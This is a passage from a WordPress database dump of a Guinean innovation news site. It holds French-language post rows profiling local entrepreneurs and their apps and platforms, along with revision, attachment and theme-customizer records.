rationalisation des ressources, la sensibilisation des populations et l’appui communautaire.\r\n\r\nEarthguinee.org a pour rôle de favoriser l’interaction entre différents acteurs (populations, médias, société civile, Gouvernement, parlement, Institutions Internationales…) par la mise à disposition d’informations crédibles et de données OpenSource sur l’environnement en Guinée.\r\n\r\n<img class=\"alignnone size-medium wp-image-837\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/er-300x255.jpg\" alt=\"\" width=\"300\" height=\"255\" />','Fatoumata Chérif crée une plateforme de médias (en ligne) pour le développement durable.','','publish','open','open','','fatoumata-cherif-cree-plateforme-de-medias-ligne-developpement-durable','','','2017-11-01 13:49:37','2017-11-01 13:49:37','',0,'https://guineeinnove.nimbasolution.com/?p=835',0,'post','',0),(836,1,'2017-11-01 13:38:25','2017-11-01 13:38:25','','fc','','inherit','open','closed','','fc','','','2017-11-01 13:38:25','2017-11-01 13:38:25','',835,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/fc.jpg',0,'attachment','image/jpeg',0),(837,1,'2017-11-01 13:39:54','2017-11-01 13:39:54','','er','','inherit','open','closed','','er','','','2017-11-01 13:39:54','2017-11-01 13:39:54','',835,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/er.jpg',0,'attachment','image/jpeg',0),(838,1,'2017-11-01 13:40:03','2017-11-01 13:40:03','<a href=\"http://Earthguinee.org\">Earthguinee.org</a> est un site spécialisé dans la production d’actualités relatives à l’environnement et au développement durable.\r\n\r\nIl promeut l’utilisation des énergies nouvelles et renouvelables, la lutte contre le changement climatique, la désertification, le respect de la biodiversité, la promotion technologies nouvelles visant la rationalisation des ressources, la sensibilisation des populations et l’appui communautaire.\r\n\r\nEarthguinee.org a pour rôle de favoriser l’interaction entre différents acteurs (populations, médias, société civile, Gouvernement, parlement, Institutions Internationales…) par la mise à disposition d’informations crédibles et de données OpenSource sur l’environnement en Guinée.\r\n\r\n<img class=\"alignnone size-medium wp-image-837\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/er-300x255.jpg\" alt=\"\" width=\"300\" height=\"255\" />','Fatoumata Chérif crée une plateforme de médias (en ligne) pour le développement durable.','','inherit','closed','closed','','835-revision-v1','','','2017-11-01 13:40:03','2017-11-01 13:40:03','',835,'https://guineeinnove.nimbasolution.com/2017/11/01/835-revision-v1/',0,'revision','',0),(839,1,'2017-11-01 14:35:33','2017-11-01 14:35:33','Senditoo <a href=\"http://www.senditoo.com/\">www.senditoo.com</a> est une plateforme universelle de recharges téléphoniques. Senditoo permet d’envoyer instantanément du crédit téléphonique sur n’importe quel mobile dans plus de 140 pays, notamment en Afrique.\r\n\r\nDisposant d’un des plus grands réseaux de recharge mobiles, Senditoo est connecté à plus de 400 opérateurs téléphoniques dans le monde, avec une portée de 4,5 milliards d\'utilisateurs de téléphones prépayés.\r\n<img class=\"alignnone size-medium wp-image-841\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/sedd.png\" alt=\"\" width=\"192\" height=\"192\" />\r\nPour les diasporas, le transfert de crédit téléphonique est la solution idéale pour un appui direct et immédiat à leur famille. Selon la Banque mondiale, les dépenses en communication dans les économies en développement représentent de 4 à 6% des revenus des ménages.\r\n\r\nLe transfert de crédit téléphonique est un marché de 3 milliards de dollars, avec une croissance annuelle de 15 à 20%.\r\n\r\nSenditoo est une startup basée au Royaume-Uni, fondée par le tech-entrepreneur guinéen Ibrahima Soumano et le Zimbabwéen Takwana Tyaranini.\r\n\r\nEn décembre 2016, deux mois après le lancement de sa plateforme, Senditoo a levé 310 000 euros, avec l\'objectif de devenir le leader du transfert de recharges téléphoniques de l\'Europe vers l\'Afrique, un marché en pleine croissance.','Ibrahima Soumano  crée une plateforme universelle de recharges téléphoniques.','','publish','open','open','','ibrahima-soumano-cree-plateforme-universelle-de-recharges-telephoniques','','','2017-11-01 14:35:33','2017-11-01 14:35:33','',0,'https://guineeinnove.nimbasolution.com/?p=839',0,'post','',0),(840,1,'2017-11-01 14:35:15','2017-11-01 14:35:15','','sen','','inherit','open','closed','','sen','','','2017-11-01 14:35:15','2017-11-01 14:35:15','',839,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/sen.jpg',0,'attachment','image/jpeg',0),(841,1,'2017-11-01 14:35:16','2017-11-01 14:35:16','','sedd','','inherit','open','closed','','sedd','','','2017-11-01 14:35:16','2017-11-01 14:35:16','',839,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/sedd.png',0,'attachment','image/png',0),(842,1,'2017-11-01 14:35:33','2017-11-01 14:35:33','Senditoo <a href=\"http://www.senditoo.com/\">www.senditoo.com</a> est une plateforme universelle de recharges téléphoniques. Senditoo permet d’envoyer instantanément du crédit téléphonique sur n’importe quel mobile dans plus de 140 pays, notamment en Afrique.\r\n\r\nDisposant d’un des plus grands réseaux de recharge mobiles, Senditoo est connecté à plus de 400 opérateurs téléphoniques dans le monde, avec une portée de 4,5 milliards d\'utilisateurs de téléphones prépayés.\r\n<img class=\"alignnone size-medium wp-image-841\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/sedd.png\" alt=\"\" width=\"192\" height=\"192\" />\r\nPour les diasporas, le transfert de crédit téléphonique est la solution idéale pour un appui direct et immédiat à leur famille. Selon la Banque mondiale, les dépenses en communication dans les économies en développement représentent de 4 à 6% des revenus des ménages.\r\n\r\nLe transfert de crédit téléphonique est un marché de 3 milliards de dollars, avec une croissance annuelle de 15 à 20%.\r\n\r\nSenditoo est une startup basée au Royaume-Uni, fondée par le tech-entrepreneur guinéen Ibrahima Soumano et le Zimbabwéen Takwana Tyaranini.\r\n\r\nEn décembre 2016, deux mois après le lancement de sa plateforme, Senditoo a levé 310 000 euros, avec l\'objectif de devenir le leader du transfert de recharges téléphoniques de l\'Europe vers l\'Afrique, un marché en pleine croissance.','Ibrahima Soumano  crée une plateforme universelle de recharges téléphoniques.','','inherit','closed','closed','','839-revision-v1','','','2017-11-01 14:35:33','2017-11-01 14:35:33','',839,'https://guineeinnove.nimbasolution.com/2017/11/01/839-revision-v1/',0,'revision','',0),(843,1,'2017-11-01 14:49:02','2017-11-01 14:49:02','Lemine Camara se bat pour restaurer le sol. Le sol a été endommagé par la mauvaise utilisation d’engrais chimiques pendant plusieurs années.\r\n\r\nM. Camara se souvient que sa défunte mère lui parlait des caboches et des feuilles du kolatier comme étant un bon fertilisant naturel. Il décide alors de tenter l’expérience en produisant du compost naturel avec des feuilles mortes de kolatier pour produire de l’igname sur un hectare de terre dans la sous-préfecture de Koba située en Basse-Guinée.\r\n\r\nPour fabriquer le compost, il a demandé à tous les 25 membres de sa famille de ramasser les feuilles mortes de kolatier dans des plantations qui ceinturent le village. Ensuite, la famille a creusé des trous de 30 centimètres de profondeur à travers son champ. M. Camara explique : « On remplit les trous avec les feuilles mortes qu’on a ramassées, puis on referme . . . [les trous]. On arrose régulièrement les trous remplis de feuilles pour faciliter la décomposition et au bout de 90 jours, chacun des trous reçoit une bouture d’igname pour un cycle d’un an. »','Lemine Camara utilise les feuilles de kola pour régénérer des terres infertiles.','','publish','open','open','','lemine-camara-utilise-feuilles-de-kola-regenerer-terres-infertiles','','','2017-11-01 14:59:38','2017-11-01 14:59:38','',0,'https://guineeinnove.nimbasolution.com/?p=843',0,'post','',0),(844,1,'2017-11-01 14:48:44','2017-11-01 14:48:44','','plantation5_0','','inherit','open','closed','','plantation5_0','','','2017-11-01 14:48:44','2017-11-01 14:48:44','',843,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/plantation5_0.jpg',0,'attachment','image/jpeg',0),(845,1,'2017-11-01 14:49:02','2017-11-01 14:49:02','Lemine Camara se bat pour restaurer le sol. Le sol a été endommagé par la mauvaise utilisation d’engrais chimiques pendant plusieurs années.\r\n\r\nM. Camara se souvient que sa défunte mère lui parlait des caboches et des feuilles du kolatier comme étant un bon fertilisant naturel. Il décide alors de tenter l’expérience en produisant du compost naturel avec des feuilles mortes de kolatier pour produire de l’igname sur un hectare de terre dans la sous-préfecture de Koba située en Basse-Guinée.\r\n\r\nPour fabriquer le compost, il a demandé à tous les 25 membres de sa famille de ramasser les feuilles mortes de kolatier dans des plantations qui ceinturent le village. Ensuite, la famille a creusé des trous de 30 centimètres de profondeur à travers son champ. M. Camara explique : « On remplit les trous avec les feuilles mortes qu’on a ramassées, puis on referme . . . [les trous]. On arrose régulièrement les trous remplis de feuilles pour faciliter la décomposition et au bout de 90 jours, chacun des trous reçoit une bouture d’igname pour un cycle d’un an. »','Lemine Camara utilise les feuilles de kola pour régénérer des terres infertiles.','','inherit','closed','closed','','843-revision-v1','','','2017-11-01 14:49:02','2017-11-01 14:49:02','',843,'https://guineeinnove.nimbasolution.com/2017/11/01/843-revision-v1/',0,'revision','',0),(846,1,'2017-11-01 15:12:43','2017-11-01 15:12:43','C\'est avec une application mobile dénommée  Kiraa (www.kiragn.com) que ce jeune entrepreneur souhaite atteindre ce but. En effet, le projet Kiraa fournis à la ville de Conakry et aux pays sans adresses formelles un système d’adresses postales leur permettant de se diriger dans la ville et se rendre dans les lieux de leur choix.','Alpha Amadou DIALLO crée une application pour aider ses compatriotes à se déplacer plus facilement.','','publish','open','open','','alpha-amadou-diallo-cree-application-aider-compatriotes-a-se-deplacer-plus-facilement','','','2017-11-01 15:14:15','2017-11-01 15:14:15','',0,'https://guineeinnove.nimbasolution.com/?p=846',0,'post','',0),(847,1,'2017-11-01 15:12:22','2017-11-01 15:12:22','','aad','','inherit','open','closed','','aad','','','2017-11-01 15:12:22','2017-11-01 15:12:22','',846,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/aad.jpg',0,'attachment','image/jpeg',0),(848,1,'2017-11-01 15:12:43','2017-11-01 15:12:43','C\'est avec une application mobile dénommée  Kiraa (www.kiragn.com) que ce jeune entrepreneur souhaite atteindre ce but. En effet, le projet Kiraa fournis à la ville de Conakry et aux pays sans adresses formelles un système d’adresses postales leur permettant de se diriger dans la ville et se rendre dans les lieux de leur choix.','Alpha Amadou DIALLO crée une application pour aider ses compatriotes à se déplacer plus facilement.','','inherit','closed','closed','','846-revision-v1','','','2017-11-01 15:12:43','2017-11-01 15:12:43','',846,'https://guineeinnove.nimbasolution.com/2017/11/01/846-revision-v1/',0,'revision','',0),(849,1,'2017-11-01 15:19:22','2017-11-01 15:19:22','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-01 15:19:22','2017-11-01 15:19:22','',360,'https://guineeinnove.nimbasolution.com/2017/11/01/360-revision-v1/',0,'revision','',0),(850,1,'2017-11-01 15:20:35','2017-11-01 15:20:35','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-01 15:20:35','2017-11-01 15:20:35','',360,'https://guineeinnove.nimbasolution.com/2017/11/01/360-revision-v1/',0,'revision','',0),(851,1,'2017-11-01 15:21:09','2017-11-01 15:21:09','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-01 15:21:09','2017-11-01 15:21:09','',360,'https://guineeinnove.nimbasolution.com/2017/11/01/360-revision-v1/',0,'revision','',0),(852,1,'2017-11-01 15:26:42','2017-11-01 15:26:42','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-01 15:26:42','2017-11-01 15:26:42','',360,'https://guineeinnove.nimbasolution.com/2017/11/01/360-revision-v1/',0,'revision','',0),(853,1,'2017-11-01 15:27:27','2017-11-01 15:27:27','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-01 15:27:27','2017-11-01 15:27:27','',360,'https://guineeinnove.nimbasolution.com/2017/11/01/360-revision-v1/',0,'revision','',0),(854,1,'2017-11-01 15:34:30','2017-11-01 15:34:30','','Technologie','','inherit','closed','closed','','2-revision-v1','','','2017-11-01 15:34:30','2017-11-01 15:34:30','',2,'https://guineeinnove.nimbasolution.com/2017/11/01/2-revision-v1/',0,'revision','',0),(855,1,'2017-11-01 15:35:06','2017-11-01 15:35:06','','Technologie','','inherit','closed','closed','','2-revision-v1','','','2017-11-01 15:35:06','2017-11-01 15:35:06','',2,'https://guineeinnove.nimbasolution.com/2017/11/01/2-revision-v1/',0,'revision','',0),(856,1,'2017-11-01 15:35:41','2017-11-01 15:35:41','','Technologie','','inherit','closed','closed','','2-revision-v1','','','2017-11-01 15:35:41','2017-11-01 15:35:41','',2,'https://guineeinnove.nimbasolution.com/2017/11/01/2-revision-v1/',0,'revision','',0),(857,1,'2017-11-01 15:38:48','2017-11-01 15:38:48','','Economie','','inherit','closed','closed','','380-revision-v1','','','2017-11-01 15:38:48','2017-11-01 15:38:48','',380,'https://guineeinnove.nimbasolution.com/2017/11/01/380-revision-v1/',0,'revision','',0),(858,1,'2017-11-01 15:38:48','2017-11-01 15:38:48','','Economie','','inherit','closed','closed','','380-revision-v1','','','2017-11-01 15:38:48','2017-11-01 15:38:48','',380,'https://guineeinnove.nimbasolution.com/2017/11/01/380-revision-v1/',0,'revision','',0),(859,1,'2017-11-01 15:39:24','2017-11-01 15:39:24','','Economie','','inherit','closed','closed','','380-revision-v1','','','2017-11-01 15:39:24','2017-11-01 15:39:24','',380,'https://guineeinnove.nimbasolution.com/2017/11/01/380-revision-v1/',0,'revision','',0),(860,1,'2017-11-01 15:41:05','2017-11-01 15:41:05','','Sport','','inherit','closed','closed','','526-revision-v1','','','2017-11-01 15:41:05','2017-11-01 15:41:05','',526,'https://guineeinnove.nimbasolution.com/2017/11/01/526-revision-v1/',0,'revision','',0),(861,1,'2017-11-01 15:42:58','2017-11-01 15:42:58','<p>[custom-facebook-feed]</p>','Agriculture','','inherit','closed','closed','','378-revision-v1','','','2017-11-01 15:42:58','2017-11-01 15:42:58','',378,'https://guineeinnove.nimbasolution.com/2017/11/01/378-revision-v1/',0,'revision','',0),(862,1,'2017-11-01 15:43:21','2017-11-01 15:43:21','<p>[custom-facebook-feed]</p>','Agriculture','','inherit','closed','closed','','378-revision-v1','','','2017-11-01 15:43:21','2017-11-01 15:43:21','',378,'https://guineeinnove.nimbasolution.com/2017/11/01/378-revision-v1/',0,'revision','',0),(863,1,'2017-11-01 15:44:33','2017-11-01 15:44:33','','Sport','','inherit','closed','closed','','526-revision-v1','','','2017-11-01 15:44:33','2017-11-01 15:44:33','',526,'https://guineeinnove.nimbasolution.com/2017/11/01/526-revision-v1/',0,'revision','',0),(864,1,'2017-11-01 15:45:36','2017-11-01 15:45:36','','Agriculture','','inherit','closed','closed','','378-revision-v1','','','2017-11-01 15:45:36','2017-11-01 15:45:36','',378,'https://guineeinnove.nimbasolution.com/2017/11/01/378-revision-v1/',0,'revision','',0),(865,1,'2017-11-01 15:47:22','2017-11-01 15:47:22','','Santé','','inherit','closed','closed','','383-revision-v1','','','2017-11-01 15:47:22','2017-11-01 15:47:22','',383,'https://guineeinnove.nimbasolution.com/2017/11/01/383-revision-v1/',0,'revision','',0),(866,1,'2017-11-01 15:47:38','2017-11-01 15:47:38','','Santé','','inherit','closed','closed','','383-revision-v1','','','2017-11-01 15:47:38','2017-11-01 15:47:38','',383,'https://guineeinnove.nimbasolution.com/2017/11/01/383-revision-v1/',0,'revision','',0),(867,1,'2017-11-01 15:51:19','2017-11-01 15:51:19','','Culture','','inherit','closed','closed','','385-revision-v1','','','2017-11-01 15:51:19','2017-11-01 15:51:19','',385,'https://guineeinnove.nimbasolution.com/2017/11/01/385-revision-v1/',0,'revision','',0),(868,1,'2017-11-01 15:52:18','2017-11-01 15:52:18','','Culture','','inherit','closed','closed','','385-revision-v1','','','2017-11-01 15:52:18','2017-11-01 15:52:18','',385,'https://guineeinnove.nimbasolution.com/2017/11/01/385-revision-v1/',0,'revision','',0),(869,1,'2017-11-01 15:57:34','2017-11-01 15:57:34','','Culture','','inherit','closed','closed','','385-revision-v1','','','2017-11-01 15:57:34','2017-11-01 15:57:34','',385,'https://guineeinnove.nimbasolution.com/2017/11/01/385-revision-v1/',0,'revision','',0),(870,1,'2017-11-01 16:02:07','2017-11-01 16:02:07','','Société','','inherit','closed','closed','','359-revision-v1','','','2017-11-01 16:02:07','2017-11-01 16:02:07','',359,'https://guineeinnove.nimbasolution.com/2017/11/01/359-revision-v1/',0,'revision','',0),(871,1,'2017-11-01 16:02:20','2017-11-01 16:02:20','','Société','','inherit','closed','closed','','359-revision-v1','','','2017-11-01 16:02:20','2017-11-01 16:02:20','',359,'https://guineeinnove.nimbasolution.com/2017/11/01/359-revision-v1/',0,'revision','',0),(872,1,'2017-11-01 16:02:28','2017-11-01 16:02:28','','Société','','inherit','closed','closed','','359-revision-v1','','','2017-11-01 16:02:28','2017-11-01 16:02:28','',359,'https://guineeinnove.nimbasolution.com/2017/11/01/359-revision-v1/',0,'revision','',0),(873,1,'2017-11-01 16:06:03','2017-11-01 16:06:03','','Plus','','inherit','closed','closed','','538-revision-v1','','','2017-11-01 16:06:03','2017-11-01 16:06:03','',538,'https://guineeinnove.nimbasolution.com/2017/11/01/538-revision-v1/',0,'revision','',0),(874,1,'2017-11-01 16:20:22','2017-11-01 16:20:22','','Nous Contacter','','inherit','closed','closed','','363-revision-v1','','','2017-11-01 16:20:22','2017-11-01 16:20:22','',363,'https://guineeinnove.nimbasolution.com/2017/11/01/363-revision-v1/',0,'revision','',0),(875,1,'2017-11-01 16:25:25','2017-11-01 16:25:25','\n			<h3>+224 625 27 22 90</h3>		\n			<h3>+224 664 61 36 77</h3>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.com/maps?q=kaloum&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near\"></iframe>		\n		','Nous Contacter','','inherit','closed','closed','','363-revision-v1','','','2017-11-01 16:25:25','2017-11-01 16:25:25','',363,'https://guineeinnove.nimbasolution.com/2017/11/01/363-revision-v1/',0,'revision','',0),(876,1,'2017-11-02 15:08:54','2017-11-02 15:08:54','Directeur Général de TechEvox, le jeune Alpha Diallo a lancé en 2017 une plateforme pour palier à la difficulté d\'accès au livre en Guinée.\r\n\r\nVoici les mots de Alpha Mamadou Diallo:\r\n\r\nEn 2017, Les projecteurs du monde se tournent vers Conakry désignée comme Capitale Mondiale du Livre. Mais force est de constater que la jeunesse guinéenne lit très peu. Ce manque d’engouement pour la lecture cache en réalité un problème plus profond. Les livres ne sont guère à la portée de toutes les bourses. Afin de faciliter l’accès au livre, nous avons développé une plateforme web/mobile dénommée « Loniya » Loniya, expression tirée du terme malinké « Lonniya » désignant la connaissance, est une application d’achat, de vente et d’échange de livres d’occasion créée par TechEvox. Cette initiative est née du constat fait sur la difficulté (liée à la cherté et la rareté des lieux de vente) d’accès aux livres neufs pour les masses. Fort de la vulgarisation de l’outil internet par une majeure partie de la population, TechEvox se propose de faciliter les mises en relation client/vendeur à travers sa plateforme <a href=\"https://www.loniya.org/\">www.loniya.org</a>. Afin, de ne pas laisser les lecteurs à la merci de la bulle spéculative, un algorithme sera mis en place pour modérer les transactions afin qu’elles respectent un seuil de prix fixe pour les versions physiques d’œuvres littéraires. De même, certaines œuvres « du domaine public », en conformité avec le respect des droits d’auteurs seront également disponibles en téléchargement libre en version numérique sur le site. La démarche de TechEvox qui se veut sociale, est de rendre cette application interactive, mais aussi d’initier et rapprocher les populations cibles de ce type inédit de librairie. Loniya permettra aux utilisateurs de vendre leurs lectures et de se procurer de nouvelles lectures plus enrichissantes. Tous les ouvrages peuvent être publiés sur la plateforme, allant des ouvrages scolaires/académiques en passant par les romans d’auteurs locaux et des livres d’auteurs célèbres, bien souvent difficiles à trouver sur le marché guinéen, permettant ainsi à la lecture d’être à la portée de tous.','Alpha Mamadou Diallo crée une plateforme pour faciliter l’accès au livre.','','inherit','closed','closed','','613-revision-v1','','','2017-11-02 15:08:54','2017-11-02 15:08:54','',613,'https://guineeinnove.nimbasolution.com/2017/11/02/613-revision-v1/',0,'revision','',0),(877,1,'2017-11-02 15:10:32','2017-11-02 15:10:32','Directeur Général de TechEvox, le jeune Alpha Diallo a lancé en 2017 une plateforme pour palier à la difficulté d\'accès au livre en Guinée.\r\n\r\nVoici les mots de Alpha Mamadou Diallo:\r\n\r\n\"En 2017, Les projecteurs du monde se tournent vers Conakry désignée comme Capitale Mondiale du Livre. Mais force est de constater que la jeunesse guinéenne lit très peu. Ce manque d’engouement pour la lecture cache en réalité un problème plus profond. Les livres ne sont guère à la portée de toutes les bourses. Afin de faciliter l’accès au livre, nous avons développé une plateforme web/mobile dénommée « Loniya » Loniya, expression tirée du terme malinké « Lonniya » désignant la connaissance, est une application d’achat, de vente et d’échange de livres d’occasion créée par TechEvox. Cette initiative est née du constat fait sur la difficulté (liée à la cherté et la rareté des lieux de vente) d’accès aux livres neufs pour les masses. Fort de la vulgarisation de l’outil internet par une majeure partie de la population, TechEvox se propose de faciliter les mises en relation client/vendeur à travers sa plateforme <a href=\"https://www.loniya.org/\">www.loniya.org</a>. Afin, de ne pas laisser les lecteurs à la merci de la bulle spéculative, un algorithme sera mis en place pour modérer les transactions afin qu’elles respectent un seuil de prix fixe pour les versions physiques d’œuvres littéraires. De même, certaines œuvres « du domaine public », en conformité avec le respect des droits d’auteurs seront également disponibles en téléchargement libre en version numérique sur le site. La démarche de TechEvox qui se veut sociale, est de rendre cette application interactive, mais aussi d’initier et rapprocher les populations cibles de ce type inédit de librairie. Loniya permettra aux utilisateurs de vendre leurs lectures et de se procurer de nouvelles lectures plus enrichissantes. Tous les ouvrages peuvent être publiés sur la plateforme, allant des ouvrages scolaires/académiques en passant par les romans d’auteurs locaux et des livres d’auteurs célèbres, bien souvent difficiles à trouver sur le marché guinéen, permettant ainsi à la lecture d’être à la portée de tous.\"','Alpha Mamadou Diallo crée une plateforme pour faciliter l’accès au livre.','','inherit','closed','closed','','613-revision-v1','','','2017-11-02 15:10:32','2017-11-02 15:10:32','',613,'https://guineeinnove.nimbasolution.com/2017/11/02/613-revision-v1/',0,'revision','',0),(878,1,'2017-11-06 09:31:08','2017-11-06 09:31:08','<p>Samba Sory Camaraest un ingénieur agricole avec son entreprise agropastoral Business Kinyapa, il prône et pratique l\'agriculture Bio et conventionnelle.</p><p>Regardez cette petite vidéo...</p>https://www.youtube.com/watch?time_continue=16&#038;v=wQaejvxoQ2o','Sambako et sa petite révolution agricole.','','inherit','closed','closed','','632-revision-v1','','','2017-11-06 09:31:08','2017-11-06 09:31:08','',632,'https://guineeinnove.nimbasolution.com/2017/11/06/632-revision-v1/',0,'revision','',0),(879,1,'2017-11-06 10:05:03','2017-11-06 10:05:03','Mayalanyi, qui veut dire « Ma santé » en soussou (dialecte de Guinée), est le carnet de santé digital du citoyen guinéen. Sur son smartphone ou sa tablette, le patient va pouvoir accéder rapidement à son profil médical en cas d’urgence, exploiter son historique de consultations pour permettre au médecin d’établir un diagnostic fiable et accéder à une banque d’informations sur les médecins. Pourquoi un carnet de santé digital?\r\n\r\n• Pour permettre au citoyen de garder l’historique des consultations sous la main, d’accéder facilement à ses informations médicales en cas d’urgence et d’avoir accès à de nombreux spécialistes à tout moment.\r\n\r\n• Pour permettre au médecin d’avoir une base de données des patients consultés, d’être répertorié dans un catalogue fiable, d’avoir accès à l’historique du patient afin de mieux traiter celui-ci et de diminuer le risque d’erreurs lors des consultations des patients.\r\n\r\n<img class=\"alignnone size-medium wp-image-665\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/poes-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" />\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Fatou thithi Camara crée un carnet de santé digitale.','','inherit','closed','closed','','662-revision-v1','','','2017-11-06 10:05:03','2017-11-06 10:05:03','',662,'https://guineeinnove.nimbasolution.com/2017/11/06/662-revision-v1/',0,'revision','',0),(880,1,'2017-11-06 14:18:44','0000-00-00 00:00:00','Mariama kaba par le biais de son agence','Mariama Kaba crée une plateforme pour faciliter le tourisme en Guinée.','','draft','open','open','','','','','2017-11-06 14:18:44','2017-11-06 14:18:44','',0,'https://guineeinnove.nimbasolution.com/?p=880',0,'post','',0),(888,1,'2017-11-07 15:17:38','2017-11-07 15:17:38','{\n    \"magzma::custom_logo\": {\n        \"value\": 887,\n        \"type\": \"theme_mod\",\n        \"user_id\": 1\n    }\n}','','','trash','closed','closed','','c751d80c-fa34-44c7-b9d5-2989679282cf','','','2017-11-07 15:17:38','2017-11-07 15:17:38','',0,'https://guineeinnove.nimbasolution.com/2017/11/07/c751d80c-fa34-44c7-b9d5-2989679282cf/',0,'customize_changeset','',0),(889,1,'2017-11-07 15:23:46','2017-11-07 15:23:46','','Guinée','','inherit','open','closed','','guinee-2','','','2017-11-07 15:23:46','2017-11-07 15:23:46','',0,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/Guinée.jpg',0,'attachment','image/jpeg',0),(890,1,'2017-11-07 15:24:00','2017-11-07 15:24:00','https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/cropped-Guinée.jpg','cropped-Guinée.jpg','','inherit','open','closed','','cropped-guinee-jpg','','','2017-11-07 15:24:00','2017-11-07 15:24:00','',0,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/cropped-Guinée.jpg',0,'attachment','image/jpeg',0),(891,1,'2017-11-07 15:24:47','2017-11-07 15:24:47','{\n    \"magzma::custom_logo\": {\n        \"value\": 890,\n        \"type\": \"theme_mod\",\n        \"user_id\": 1\n    }\n}','','','trash','closed','closed','','10c4ba9f-e0dc-46e7-b9dc-22a3670cda69','','','2017-11-07 15:24:47','2017-11-07 15:24:47','',0,'https://guineeinnove.nimbasolution.com/?p=891',0,'customize_changeset','',0),(892,1,'2017-11-07 15:25:06','2017-11-07 15:25:06','','Guinée (2)','','inherit','open','closed','','guinee-2-2','','','2017-11-07 15:25:06','2017-11-07 15:25:06','',0,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/Guinée-2.png',0,'attachment','image/png',0),(893,1,'2017-11-07 15:25:55','2017-11-07 15:25:55','{\n    \"magzma::custom_logo\": {\n        \"value\": 892,\n        \"type\": \"theme_mod\",\n        \"user_id\": 1\n    }\n}','','','trash','closed','closed','','4610ce19-f840-4cdf-ba60-26c6c4cc6686','','','2017-11-07 15:25:55','2017-11-07 15:25:55','',0,'https://guineeinnove.nimbasolution.com/?p=893',0,'customize_changeset','',0),(894,1,'2017-11-07 15:30:00','2017-11-07 15:30:00','{\n    \"custom_css[magzma]\": {\n        \"value\": \"#header .logo-image, #header .logo-title {\\n    padding-top: 0px;\\n}\\n.page-title-wrap h3 {\\n    margin-bottom: 0;\\n    margin-top: 10px;\\n}\\n.page-title {\\n    background-color: #ffffff;\\n    padding: 0px 0;\\n}\\n.wrapper-space {\\n    padding: 0px 0;\\n}\\n.logo {\\n\\theight: 0px;\\n}\\n\",\n        \"type\": \"custom_css\",\n        \"user_id\": 1\n    }\n}','','','trash','closed','closed','','623469ce-6860-4931-98f0-517453dabc9e','','','2017-11-07 15:30:00','2017-11-07 15:30:00','',0,'https://guineeinnove.nimbasolution.com/?p=894',0,'customize_changeset','',0),(895,1,'2017-11-07 15:30:00','2017-11-07 15:30:00','#header .logo-image, #header .logo-title {\n    padding-top: 0px;\n}\n.page-title-wrap h3 {\n    margin-bottom: 0;\n    margin-top: 10px;\n}\n.page-title {\n    background-color: #ffffff;\n    padding: 0px 0;\n}\n.wrapper-space {\n    padding: 0px 0;\n}\n.logo {\n	height: 0px;\n}\n','magzma','','inherit','closed','closed','','429-revision-v1','','','2017-11-07 15:30:00','2017-11-07 15:30:00','',429,'https://guineeinnove.nimbasolution.com/2017/11/07/429-revision-v1/',0,'revision','',0),(897,1,'2017-11-08 12:24:25','2017-11-08 12:24:25','Suivre la vidéo ci-dessous...\r\n\r\n[video width=\"1280\" height=\"720\" mp4=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/JAMES-PIERRE-Un-nouveau-Einstein-en-Afrique-Un-Guinéen-publie...via-torchbrowser.com_.mp4\"][/video]','Un Guinéen publie une formule mathématique qui met fin à une vielle recherche de plus de 2000 